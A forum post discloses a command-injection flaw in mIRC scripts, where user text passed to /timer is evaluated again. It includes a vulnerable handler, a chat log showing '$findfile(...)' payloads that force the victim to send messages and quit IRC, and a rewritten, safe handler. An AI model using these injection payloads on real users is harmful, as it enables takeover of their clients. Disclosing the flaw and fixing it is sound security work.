I have found an exploit that will allow a hacker to take over somebody's mIRC, allowing them to run files, make the user quit IRC, or anything else. It involves the use of $findfile. We found it by testing a remote webserver code I was working on with sockets, making sure it was secure. We stumbled across $findfile and decided to test. Sure enough, it allowed us to do all kinds of stuff to each other. I tested on a lower basis with the following code that simply repeats what a user says:
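on 1:text:*:#:{
  ; repeat whatever follows !makemesay, but only in #temp
  if ($1 == !makemesay) && ($chan == #temp) {
    ; store the sender's text, then say it one second later through a timer
    set %two $2-
    timer 1 1 msg #temp $nick made me say %two
  }
}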
Nobody would even think that to be exploitable...
<Qb2> !makemesay woof
<Qb_Master> Qb2 made me say woof
<Qb2> !makemesay $findfile(c:\,*,3,1,msg #temp test)
<Qb_Master> test
<Qb_Master> Qb2 made me say c:\autoexec.bat <we'll just say that's the 3rd file in c:\ in this case>
<Qb2> !makemesay $findfile(c:\,*,3,1,quit HACKED!)
* Qb_Master has quit irc (quit: HACKED!)

Many, many, many people have commands that repeat text like that, and somebody with this knowledge, with that code, basically has complete control over that user's computer!
PLEASE reply back to this message; it's an urgent glitch. If used with sockets, it can also allow this anonymously, making it even worse!
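
The handler above, rewritten so the sender's text is never evaluated as script. This is an added example, not part of the original post. It relies on the fact that /timer evaluates its command line a second time when it fires; the alias name "safe" and the !delayedsay trigger are made up for illustration.

```mirc
; Constructed example for channel #temp, as in the post.
; "safe" is a helper name chosen here, not a built-in identifier.
; It base64-encodes the text immediately and returns a literal
; $decode(...,m) call. When the timer fires and evaluates its command
; line again, that call only decodes the text back into a plain string,
; so identifiers such as $findfile inside it are never run.
alias safe return $!decode( $+ $encode($1,m) $+ ,m)

; Option 1: no timer at all.
; $2- is evaluated once, yields the sender's text, and is sent as-is.
on 1:text:!makemesay *:#temp:{
  msg $chan $nick made me say $2-
}

; Option 2: a delay is required.
; Everything that came from the remote user goes through $safe()
; before it is placed on the timer's command line.
on 1:text:!delayedsay *:#temp:{
  .timer 1 1 msg $chan $safe($nick made me say $2-)
}
```

The same wrapping applies anywhere remote text reaches a command that is evaluated later, not only to /timer.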